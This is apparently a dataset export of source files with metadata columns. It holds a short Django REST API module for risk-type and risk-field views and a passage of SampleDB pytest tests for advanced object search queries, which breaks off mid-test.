| 161
| 49.320943
| 0.853347
| 0.431132
| 0
| 0.871154
| 1
| 0
| 0.116605
| 0.029114
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163462
| false
| 0.001923
| 0.013462
| 0
| 0.275
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bcb80ebe3612c9bd94156df9a835873425491ec8
| 1,562
|
py
|
Python
|
intuitiveweb/risks/api.py
|
Jonathan-web-dev/Django-Vue
|
ee700e44f653983cdce42b41145a7855564bc661
|
[
"MIT"
] | 1
|
2019-01-09T12:55:46.000Z
|
2019-01-09T12:55:46.000Z
|
intuitiveweb/risks/api.py
|
Jonathan-web-dev/Django-Vue
|
ee700e44f653983cdce42b41145a7855564bc661
|
[
"MIT"
] | 5
|
2020-06-05T18:48:15.000Z
|
2022-01-13T00:49:11.000Z
|
intuitiveweb/risks/api.py
|
New-Bee-Star/Django-Vue
|
ee700e44f653983cdce42b41145a7855564bc661
|
[
"MIT"
] | null | null | null |
from .models import RiskField, RiskType
from .serializers import RiskSerializer, RiskTypeSerializer
from django.shortcuts import get_object_or_404
from rest_framework.generics import ListAPIView, RetrieveAPIView
class ListAllRiskTypeView(ListAPIView):
"""API to get one object of RiskField model"""
serializer_class = RiskTypeSerializer
queryset = RiskType.objects.all()
def get_object(self):
queryset = self.filter_queryset(self.get_queryset())
return queryset
class ListRiskTypeView(RetrieveAPIView):
"""API to get one object of RiskField model"""
serializer_class = RiskTypeSerializer
queryset = RiskType.objects.all()
def get_object(self):
queryset = self.filter_queryset(self.get_queryset())
id = self.kwargs.get('id', None)
obj = get_object_or_404(queryset,pk=id)
return obj
class ListAllRiskFieldView(ListAPIView):
"""API to get one object of RiskField model"""
serializer_class = RiskSerializer
queryset = RiskField.objects.all()
def get_object(self):
queryset = self.filter_queryset(self.get_queryset())
return queryset
class ListRiskFieldView(RetrieveAPIView):
"""API to get one object of RiskField model"""
serializer_class = RiskSerializer
queryset = RiskField.objects.all()
def get_object(self):
queryset = self.filter_queryset(self.get_queryset())
# make sure to catch 404's below
id = self.kwargs.get('id', None)
obj = get_object_or_404(queryset,pk=id)
return obj
| 29.471698
| 64
| 0.711908
| 184
| 1,562
| 5.902174
| 0.255435
| 0.088398
| 0.029466
| 0.040516
| 0.734807
| 0.734807
| 0.734807
| 0.734807
| 0.734807
| 0.734807
| 0
| 0.009623
| 0.201665
| 1,562
| 52
| 65
| 30.038462
| 0.861267
| 0.12484
| 0
| 0.75
| 0
| 0
| 0.002976
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.125
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
bcba1d139b67707cfdde351960bca956bf38717c
| 120,964
|
py
|
Python
|
tests/logic/test_search.py
|
nilsholle/sampledb
|
90d7487a3990995ca2ec5dfd8b59d4739d6a9a87
|
[
"MIT"
] | 5
|
2020-02-13T15:25:37.000Z
|
2021-05-06T21:05:14.000Z
|
tests/logic/test_search.py
|
nilsholle/sampledb
|
90d7487a3990995ca2ec5dfd8b59d4739d6a9a87
|
[
"MIT"
] | 28
|
2019-11-12T14:14:08.000Z
|
2022-03-11T16:29:27.000Z
|
tests/logic/test_search.py
|
nilsholle/sampledb
|
90d7487a3990995ca2ec5dfd8b59d4739d6a9a87
|
[
"MIT"
] | 8
|
2019-12-10T15:46:02.000Z
|
2021-11-02T12:24:52.000Z
|
# coding: utf-8
"""
"""
import sqlalchemy
import pytest
from sampledb import db
import sampledb.logic
import sampledb.models
@pytest.fixture
def user():
user = sampledb.models.User(
name="User",
email="example@example.com",
type=sampledb.models.UserType.PERSON)
db.session.add(user)
db.session.commit()
return user
@pytest.fixture
def action():
action = sampledb.logic.actions.create_action(
action_type_id=sampledb.models.ActionType.SAMPLE_CREATION,
schema={
'title': 'Example Object',
'type': 'object',
'properties': {
'name': {
'title': 'Name',
'type': 'text'
},
'tags': {
'title': 'Tags',
'type': 'tags'
},
'text_attr': {
'title': 'Text Attribute 1',
'type': 'text'
},
'bool_attr': {
'title': 'Boolean Attribute 1',
'type': 'bool'
},
'bool_attr2': {
'title': 'Boolean Attribute 2',
'type': 'bool'
},
'bool_attr3': {
'title': 'Boolean Attribute 3',
'type': 'bool'
},
'datetime_attr': {
'title': 'Datetime Attribute',
'type': 'datetime'
},
'quantity_attr': {
'title': 'Quantity Attribute',
'type': 'quantity',
'units': 'm'
},
'array_attr': {
'title': 'Array Attribute',
'type': 'array',
'items': {
'title': 'Array Attribute Item',
'type': 'object',
'properties': {
'text_attr': {
'title': 'Array Attribute Item Text Attribute',
'type': 'text'
},
'bool_attr': {
'title': 'Array Attribute Item Boolean Attribute',
'type': 'bool'
}
}
}
}
},
'required': ['name']
}
)
return action
def test_find_by_empty_string(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('', use_advanced_search=False)
assert not use_advanced_search
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
def test_find_by_simple_text(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'text_attr': {
'_type': 'text',
'text': "This is a test."
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'text_attr': {
'_type': 'text',
'text': "This is an example."
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('test', use_advanced_search=False)
assert not use_advanced_search
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert 'test' in object.data['text_attr']['text']
def test_find_by_tag(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'tags': {
'_type': 'tags',
'tags': ['tag1', 'tag2', 'tag3']
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'tags': {
'_type': 'tags',
'tags': ['tag2', 'tag3']
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('#tag1', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert 'tag1' in object.data['tags']['tags']
def test_find_by_unknown_tag(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'tags': {
'_type': 'tags',
'tags': ['tag1', 'tag2', 'tag3']
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'tags': {
'_type': 'tags',
'tags': ['tag2', 'tag3']
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('#tag4', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_attribute(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
def test_find_by_boolean_attribute_equal(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr == True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr == False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert not object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True == bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False == bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert not object.data['bool_attr']['value']
def test_find_by_boolean_attribute_not_equal(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr != True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert not object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr != False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True != bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert not object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False != bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
def test_find_by_equal_values(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True == True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True == False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 == 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 == 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"Example" == "Example"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"Example" == "Exomple"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm == 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm == 20km', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_unequal_values(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True != True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True != False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 != 2018-10-05', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2018-10-05 != 2018-10-04', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"Example" != "Example"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"Example" != "Exomple"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm != 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm != 20km', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
def test_find_by_boolean_attribute_or(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
},
'bool_attr2': {
'_type': 'bool',
'value': True
},
'bool_attr3': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': False
},
'bool_attr2': {
'_type': 'bool',
'value': True
},
'bool_attr3': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr or True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr or False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True or bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False or bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr or bool_attr2', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
for object in objects:
assert ('bool_attr' in object.data and object.data['bool_attr']['value']) or ('bool_attr2' in object.data and object.data['bool_attr2']['value'])
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr or bool_attr3', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert ('bool_attr' in object.data and object.data['bool_attr']['value']) or ('bool_attr3' in object.data and object.data['bool_attr3']['value'])
def test_find_by_boolean_attribute_and(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
},
'bool_attr2': {
'_type': 'bool',
'value': True
},
'bool_attr3': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': False
},
'bool_attr2': {
'_type': 'bool',
'value': True
},
'bool_attr3': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr and True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr and False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True and bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False and bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr and bool_attr2', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert ('bool_attr' in object.data and object.data['bool_attr']['value']) and ('bool_attr2' in object.data and object.data['bool_attr2']['value'])
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr and bool_attr3', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_boolean_boolean_and(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True and True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True and False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False and True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False and False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_boolean_boolean_or(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True or True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True or False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False or True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False or False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_boolean_expression_and(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True and (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True and (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False and (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False and (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) and True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) and False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and True) and (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and True) and (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) and (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) and (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_boolean_expression_or(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True or (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True or (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
